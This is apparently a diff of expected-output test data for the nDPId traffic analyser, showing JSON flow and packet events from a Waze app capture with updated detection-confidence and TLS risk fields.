+00801{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":157,"source":"waze.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587871941,"flow_last_seen":1435587872341,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":157,"flow_tot_l4_payload_len":159,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1435587872341,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45546,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"},"http": {"hostname":"cres.waze.com","url":"cres.waze.com\/newVconfig\/1.0\/3\/prompts_conf.buf?rtserver-id=15","code":0,"content_type":"","user_agent":"\/3.9.4.0"}}
 00564{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":166,"source":"waze.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587872476,"flow_last_seen":1435587872476,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1435587872476,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45552,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":166,"source":"waze.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1435587872476,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1435587872476,"pkt":"ABoRAAACABoRAAABCABFAAA8WSJAAEAGvP4KCAABNubjrLHwAFDxQTSmAAAAAKAC\/\/\/drgAAAgQFtAQCCAoACG2EAAAAAAEDAwg="}
 00444{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":167,"source":"waze.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1435587872477,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1435587872477,"pkt":"ABoRAAACABoRAAABCABFAAAodLxAABAG0Xg25uOsCggAAQBQsfAOvstZ8UE0p1AS\/\/\/Y9QAA"}
 00444{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":171,"source":"waze.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1435587872478,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1435587872478,"pkt":"ABoRAAACABoRAAABCABFAAAoWSNAAEAGvREKCAABNubjrLHwAFDxQTSnDr7LWlAQ\/\/\/Y9gAA"}
-00761{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":173,"source":"waze.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587872476,"flow_last_seen":1435587872479,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":152,"flow_tot_l4_payload_len":152,"flow_avg_l4_payload_len":38,"midstream":0,"ts_msec":1435587872479,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45552,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"},"http": {"hostname":"cres.waze.com","url":"cres.waze.com\/langs\/1.0\/lang.portuguese_br?rtserver-id=15","code":0,"content_type":"","user_agent":"\/3.9.4.0"}}
-00888{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":177,"source":"waze.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587871935,"flow_last_seen":1435587872515,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1368,"flow_tot_l4_payload_len":1550,"flow_avg_l4_payload_len":258,"midstream":0,"ts_msec":1435587872515,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.103.105","src_port":51051,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"39f74f5618836d3c5f7dcccc9f67ba75","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA"}}
-00888{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":179,"source":"waze.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587871918,"flow_last_seen":1435587872568,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1368,"flow_tot_l4_payload_len":1550,"flow_avg_l4_payload_len":258,"midstream":0,"ts_msec":1435587872568,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.103.105","src_port":51049,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"39f74f5618836d3c5f7dcccc9f67ba75","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA"}}
-01141{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":180,"source":"waze.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587871939,"flow_last_seen":1435587872569,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3491,"flow_tot_l4_payload_len":3673,"flow_avg_l4_payload_len":612,"midstream":0,"ts_msec":1435587872569,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"52.17.114.219","src_port":39010,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.world.waze.com","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"39f74f5618836d3c5f7dcccc9f67ba75","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=*.world.waze.com","fingerprint":"30:50:FA:42:94:E4:1A:34:9B:23:55:CB:7B:F2:0D:76:FA:1C:58:4B"}}
+00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":173,"source":"waze.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587872476,"flow_last_seen":1435587872479,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":152,"flow_tot_l4_payload_len":152,"flow_avg_l4_payload_len":38,"midstream":0,"ts_msec":1435587872479,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45552,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"},"http": {"hostname":"cres.waze.com","url":"cres.waze.com\/langs\/1.0\/lang.portuguese_br?rtserver-id=15","code":0,"content_type":"","user_agent":"\/3.9.4.0"}}
+00795{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":175,"source":"waze.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587872476,"flow_last_seen":1435587872479,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":152,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1435587872479,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45552,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"},"http": {"hostname":"cres.waze.com","url":"cres.waze.com\/langs\/1.0\/lang.portuguese_br?rtserver-id=15","code":0,"content_type":"","user_agent":"\/3.9.4.0"}}
+00993{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":177,"source":"waze.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587871935,"flow_last_seen":1435587872515,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1368,"flow_tot_l4_payload_len":1550,"flow_avg_l4_payload_len":258,"midstream":0,"ts_msec":1435587872515,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.103.105","src_port":51051,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"39f74f5618836d3c5f7dcccc9f67ba75","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA"}}
+00993{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":179,"source":"waze.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587871918,"flow_last_seen":1435587872568,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1368,"flow_tot_l4_payload_len":1550,"flow_avg_l4_payload_len":258,"midstream":0,"ts_msec":1435587872568,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.103.105","src_port":51049,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"39f74f5618836d3c5f7dcccc9f67ba75","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA"}}
+01246{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":180,"source":"waze.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587871939,"flow_last_seen":1435587872569,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3491,"flow_tot_l4_payload_len":3673,"flow_avg_l4_payload_len":612,"midstream":0,"ts_msec":1435587872569,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"52.17.114.219","src_port":39010,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.world.waze.com","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"39f74f5618836d3c5f7dcccc9f67ba75","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=*.world.waze.com","fingerprint":"30:50:FA:42:94:E4:1A:34:9B:23:55:CB:7B:F2:0D:76:FA:1C:58:4B"}}
 00564{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":193,"source":"waze.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587872702,"flow_last_seen":1435587872702,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1435587872702,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45554,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":193,"source":"waze.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1435587872702,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1435587872702,"pkt":"ABoRAAACABoRAAABCABFAAA8Y6lAAEAGsncKCAABNubjrLHyAFAC8Q4\/AAAAAKAC\/\/\/yUgAAAgQFtAQCCAoACG2WAAAAAAEDAwg="}
 00444{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":194,"source":"waze.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1435587872704,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1435587872704,"pkt":"ABoRAAACABoRAAABCABFAAAodMpAABAG0Wo25uOsCggAAQBQsfL9DvHAAvEOQFAS\/\/\/Y8wAA"}
 00445{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":199,"source":"waze.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":3,"flow_last_seen":1435587872705,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1435587872705,"pkt":"ABoRAAACABoRAAABCABFAAAoY6pAAEAGsooKCAABNubjrLHyAFAC8Q5A\/Q7xwVAQ\/\/\/Y9AAA"}
-00760{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":201,"source":"waze.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587872702,"flow_last_seen":1435587872706,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1435587872706,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45554,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"},"http": {"hostname":"cres.waze.com","url":"cres.waze.com\/newVconfig\/1.0\/3\/lang.conf?rtserver-id=15","code":0,"content_type":"","user_agent":"\/3.9.4.0"}}
-00888{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":247,"source":"waze.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587871929,"flow_last_seen":1435587873486,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1368,"flow_tot_l4_payload_len":1550,"flow_avg_l4_payload_len":258,"midstream":0,"ts_msec":1435587873486,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.103.105","src_port":51050,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"39f74f5618836d3c5f7dcccc9f67ba75","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA"}}
-01130{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":249,"source":"waze.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1435587871935,"flow_last_seen":1435587873688,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2111,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":457,"midstream":0,"ts_msec":1435587873688,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.103.105","src_port":51051,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.waze.com","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"39f74f5618836d3c5f7dcccc9f67ba75","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=*.waze.com","fingerprint":"A9:35:F0:16:17:A3:FD:73:EC:0C:03:24:F8:34:5A:8A:B3:D7:8D:57"}}
-01130{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":251,"source":"waze.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1435587871929,"flow_last_seen":1435587873741,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2111,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":457,"midstream":0,"ts_msec":1435587873741,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.103.105","src_port":51050,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.waze.com","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"39f74f5618836d3c5f7dcccc9f67ba75","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=*.waze.com","fingerprint":"A9:35:F0:16:17:A3:FD:73:EC:0C:03:24:F8:34:5A:8A:B3:D7:8D:57"}}
-01131{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":262,"source":"waze.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1435587871918,"flow_last_seen":1435587874033,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1368,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":366,"midstream":0,"ts_msec":1435587874033,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.103.105","src_port":51049,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.waze.com","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"39f74f5618836d3c5f7dcccc9f67ba75","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=*.waze.com","fingerprint":"A9:35:F0:16:17:A3:FD:73:EC:0C:03:24:F8:34:5A:8A:B3:D7:8D:57"}}
+00786{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":201,"source":"waze.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587872702,"flow_last_seen":1435587872706,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1435587872706,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45554,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"},"http": {"hostname":"cres.waze.com","url":"cres.waze.com\/newVconfig\/1.0\/3\/lang.conf?rtserver-id=15","code":0,"content_type":"","user_agent":"\/3.9.4.0"}}
+00794{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":203,"source":"waze.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587872702,"flow_last_seen":1435587872706,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":152,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1435587872706,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45554,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"},"http": {"hostname":"cres.waze.com","url":"cres.waze.com\/newVconfig\/1.0\/3\/lang.conf?rtserver-id=15","code":0,"content_type":"","user_agent":"\/3.9.4.0"}}
+00993{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":247,"source":"waze.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587871929,"flow_last_seen":1435587873486,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1368,"flow_tot_l4_payload_len":1550,"flow_avg_l4_payload_len":258,"midstream":0,"ts_msec":1435587873486,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.103.105","src_port":51050,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"39f74f5618836d3c5f7dcccc9f67ba75","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA"}}
+01235{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":249,"source":"waze.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1435587871935,"flow_last_seen":1435587873688,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2111,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":457,"midstream":0,"ts_msec":1435587873688,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.103.105","src_port":51051,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.waze.com","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"39f74f5618836d3c5f7dcccc9f67ba75","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=*.waze.com","fingerprint":"A9:35:F0:16:17:A3:FD:73:EC:0C:03:24:F8:34:5A:8A:B3:D7:8D:57"}}
+01235{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":251,"source":"waze.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1435587871929,"flow_last_seen":1435587873741,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2111,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":457,"midstream":0,"ts_msec":1435587873741,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.103.105","src_port":51050,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.waze.com","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"39f74f5618836d3c5f7dcccc9f67ba75","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=*.waze.com","fingerprint":"A9:35:F0:16:17:A3:FD:73:EC:0C:03:24:F8:34:5A:8A:B3:D7:8D:57"}}
+01236{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":262,"source":"waze.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1435587871918,"flow_last_seen":1435587874033,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1368,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":366,"midstream":0,"ts_msec":1435587874033,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.103.105","src_port":51049,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.waze.com","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"39f74f5618836d3c5f7dcccc9f67ba75","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=*.waze.com","fingerprint":"A9:35:F0:16:17:A3:FD:73:EC:0C:03:24:F8:34:5A:8A:B3:D7:8D:57"}}
 00564{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":346,"source":"waze.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587878215,"flow_last_seen":1435587878215,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1435587878215,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"52.17.114.219","src_port":39021,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":346,"source":"waze.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1435587878215,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1435587878215,"pkt":"ABoRAAACABoRAAABCABFAAA8EZdAAEAGeDAKCAABNBFy25htAbtopH5VAAAAAKAC\/\/+mHQAAAgQFtAQCCAoACG\/CAAAAAAEDAwg="}
 00443{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":347,"source":"waze.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1435587878217,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1435587878217,"pkt":"ABoRAAACABoRAAABCABFAAAodRhAABAGRMM0EXLbCggAAQG7mG2XW4GqaKR+VlAS\/\/9ktAAA"}
 00443{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":348,"source":"waze.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1435587878217,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1435587878217,"pkt":"ABoRAAACABoRAAABCABFAAAoEZhAAEAGeEMKCAABNBFy25htAbtopH5Wl1uBq1AQ\/\/9ktQAA"}
